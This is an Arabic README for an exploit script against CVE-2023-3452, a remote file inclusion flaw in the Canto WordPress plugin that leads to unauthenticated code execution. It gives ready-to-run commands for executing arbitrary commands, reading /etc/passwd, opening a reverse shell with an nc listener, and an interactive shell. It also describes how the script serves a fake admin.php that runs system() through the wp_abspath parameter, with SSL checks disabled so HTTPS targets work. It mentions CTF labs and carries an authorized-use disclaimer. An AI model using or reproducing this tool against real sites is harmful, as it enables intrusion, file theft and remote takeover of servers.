
استغلال ثغرة CVE-2023-3452 في إضافة Canto لووردبريس لتنفيذ التعليمات البرمجية عن بُعد، مع دعم HTTPS
استغلال لثغرة تضمين الملفات عن بعد (RFI) في إضافة Canto لووردبريس (الإصدارات ≤ 3.0.4). تعمل فعلياً على HTTPS — بينما استسلمت أدوات الإثبات المفاهيمية العامة الأخرى لـ SSL.
الفضل لمن يستحقه: تم اكتشاف هذه الثغرة من قبل آخرين. لقد قمت فقط بعمل نسخة لا تتعطل على الأهداف التي تستخدم HTTPS.
| CVE | CVE-2023-3452 |
| EDB-ID | 51826 |
| النوع | تضمين ملف عن بعد (RFI) → تنفيذ أكواد عن بعد بدون مصادقة |
| المتأثر | إضافة Canto لووردبريس < 3.0.5 (الإصدارات 3.0.4 فأقل) |
| مكتشف الثغرة | ليوبولدو أنجولو (leoanggal1) — 27 فبراير 2024 |
| الموقع | /wp-content/plugins/canto/includes/lib/download.php |
| ناقل الهجوم | يتم استخدام wp_abspath لتضمين ملفات PHP بدون أي تحقق من الصحة — نقوم بتضمين ملفنا عن بعد. |
معظم أدوات الاستغلال لهذه الثغرة تتعطل على HTTPS بسبب التحقق من SSL. هذا السكريبت:
verify=False لكي تعمل أهداف HTTPS فعليًاrequestspip install -r requirements.txt
أو فقط: pip install requests
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]
* بدون أمر = يقوم بتشغيل id; whoami; hostname كفحص سلامة
أمر واحد:
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"
قراءة ملف:
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"
شيل عكسي (قم بتشغيل nc -lvnp 4444 أولاً):
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444
الوضع التفاعلي:
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i
هدف CTF باستخدام HTTPS:
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"
/wp-content/plugins/canto/readme.txt، ويحلل الإصدار (الإصدار ≤ 3.0.4 = معرض للثغرة)wp-admin/admin.php مزيف يقوم بتشغيل الأمر الخاص بك باستخدام system()download.php مع wp_abspath=http://LHOST:LPORT لتضمين ملف PHP البعيدLHOST:LPORT (في HTB/المختبرات، هذا هو عنوان IP الخاص بشبكة VPN)-p)الاختبار المصرح به والتعليم فقط. لا تلمس إلا الأنظمة المسموح لك بها. أي شيء آخر غير قانوني.
MIT
| الخيار | الوصف | مطلوب |
|---|
-t, --target | رابط ووردبريس الهدف (HTTP أو HTTPS) | نعم |
-l, --lhost | عنوان IP الخاص بك — الهدف يحتاج للوصول إليه لتحميل الحمولة | نعم |
-p, --lport | منفذ خادم الحمولة (الافتراضي: 8888) | لا |
-c, --command | الأمر الذي سيتم تنفيذه على الهدف | لا* |
--revshell | إنشاء شيل عكسي | لا |
--shell-port | منفذ المستمع للشيل العكسي (الافتراضي: 4444) | لا |
-i, --interactive | وضع الشيل التفاعلي | لا |
-v, --verbose | مخرجات إضافية | لا |
--skip-check | تخطي فحص الثغرة | لا |